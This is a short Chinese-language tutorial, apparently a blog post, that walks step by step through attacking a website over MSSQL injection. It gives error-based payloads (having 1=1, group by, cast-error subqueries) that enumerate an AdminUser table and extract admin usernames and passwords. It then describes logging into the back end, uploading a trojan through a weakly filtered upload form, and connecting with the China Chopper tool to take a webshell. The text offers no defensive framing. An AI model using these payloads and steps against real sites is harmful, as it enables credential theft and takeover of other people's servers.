1. 程式人生 > >MSSQL注入之木馬上傳拿webshell

MSSQL注入之木馬上傳拿webshell

1.檢測是否存在注入點:依次新增語句',and 1=1和and 1=2,來判斷網站是否存在注入點

2.利用語句:a' having 1=1--爆出表名和欄位名AdminUser.AdminId

3.接著爆出其他欄位:

a' group by adminuser.adminid having 1=1--  //爆出使用者名稱欄位

a' group by adminuser.adminid,adminuser.username having 1=1-- //爆出密碼欄位

4.爆使用者名稱和密碼:

' and (select top 1 adminuser.username from adminuser)>0 //爆使用者名稱

' and (select top 1 adminuser.password from adminuser)>0 //爆密碼

5.用猜出的使用者名稱和密碼登入後臺

6.查詢可以上傳的地方,上傳本地木馬檔案(如果過濾不嚴,可以直接上傳),記錄木馬的路徑

7.使用中國菜刀連線木馬,拿到webshell